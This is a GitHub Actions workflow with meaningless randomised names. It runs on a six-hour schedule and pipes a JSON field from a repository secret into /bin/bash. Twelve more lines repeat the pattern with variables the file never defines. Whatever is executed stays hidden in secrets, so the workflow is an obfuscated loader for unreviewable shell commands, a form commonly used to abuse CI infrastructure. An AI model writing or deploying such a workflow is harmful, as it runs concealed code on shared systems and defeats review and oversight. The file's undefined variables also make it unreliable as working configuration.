name: zengwutuan1234

on:
  workflow_dispatch:
  schedule:
    - cron: '29 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zengwutuan1234
        env:
          kna04: ${{ secrets.kna04 }}
        run: |
          echo $kna04 | jq -r .cs998 | /bin/bash
          echo $iqjs1 | jq -r .qbbk3994 | /bin/bash
          echo $l3 | jq -r .ylwvb534 | /bin/bash
          echo $rmrsw26 | jq -r .mm7 | /bin/bash
          echo $etnsa016 | jq -r .vhb02745 | /bin/bash
          echo $ycei38260 | jq -r .ojf12 | /bin/bash
          echo $fxx34 | jq -r .twoot49192 | /bin/bash
          echo $mbst22 | jq -r .anslu89 | /bin/bash
          echo $y2764 | jq -r .od628 | /bin/bash
          echo $ffryu1139 | jq -r .x5445 | /bin/bash
          echo $ndric6 | jq -r .smwh2 | /bin/bash
          echo $jivgw031 | jq -r .cvjcy8 | /bin/bash
          echo $ih50602 | jq -r .lu0 | /bin/bash

